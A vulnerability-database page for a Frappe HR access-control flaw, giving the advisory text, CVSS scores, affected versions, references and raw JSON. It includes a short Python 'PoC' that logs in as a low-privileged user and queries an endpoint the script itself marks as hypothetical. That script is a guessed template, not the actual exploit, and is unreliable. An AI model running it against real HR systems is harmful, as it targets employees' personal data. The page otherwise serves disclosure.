Security Vulnerability Report
中文
CVE-2026-40888 CVSS 6.5 MEDIUM

CVE-2026-40888

Published: 2026-04-21 20:17:03
Last Modified: 2026-04-27 19:39:35
Source: [email protected]

Description

Frappe HR is an open-source human resources management solution (HRMS). Prior to versions 15.58.1 and 16.4.1, an authenticated user with default role can access unauthorized information by exploiting certain api endpoint. Versions 15.58.1 and 16.4.1 contain a patch. No known workarounds are available.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:frappe:frappe_hr:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:frappe:frappe_hr:*:*:*:*:*:*:*:* - VULNERABLE
Frappe HR < 15.58.1
Frappe HR < 16.4.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target configuration target_url = "http://target-instance.com" vulnerable_api = "/api/method/frappe.hr.doctype.employee.employee.get_details" # Hypothetical endpoint # Authentication with low-privileged user session = requests.Session() login_data = {"usr": "employee", "pwd": "password"} session.post(f"{target_url}/api/method/login", data=login_data) # Exploit: Access unauthorized information response = session.get(f"{target_url}{vulnerable_api}") if response.status_code == 200: print("[+] Vulnerability Exploited Successfully") print("[+] Leaked Data:", response.json()) else: print("[-] Exploit Failed")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-40888", "sourceIdentifier": "[email protected]", "published": "2026-04-21T20:17:02.537", "lastModified": "2026-04-27T19:39:35.313", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Frappe HR is an open-source human resources management solution (HRMS). Prior to versions 15.58.1 and 16.4.1, an authenticated user with default role can access unauthorized information by exploiting certain api endpoint. Versions 15.58.1 and 16.4.1 contain a patch. No known workarounds are available."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:frappe:frappe_hr:*:*:*:*:*:*:*:*", "versionEndExcluding": "15.58.1", "matchCriteriaId": "B2C77B83-5D4D-4AE4-9984-373F1B5DE758"}, {"vulnerable": true, "criteria": "cpe:2.3:a:frappe:frappe_hr:*:*:*:*:*:*:*:*", "versionStartIncluding": "16.0.0", "versionEndExcluding": "16.4.1", "matchCriteriaId": "CF4E8819-D5B3-431F-B95C-4D615965CFA9"}]}]}], "references": [{"url": "https://github.com/frappe/hrms/releases/tag/v15.58.1", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/frappe/hrms/releases/tag/v16.4.1", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/frappe/hrms/security/advisories/GHSA-4375-7rxj-9hfx", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.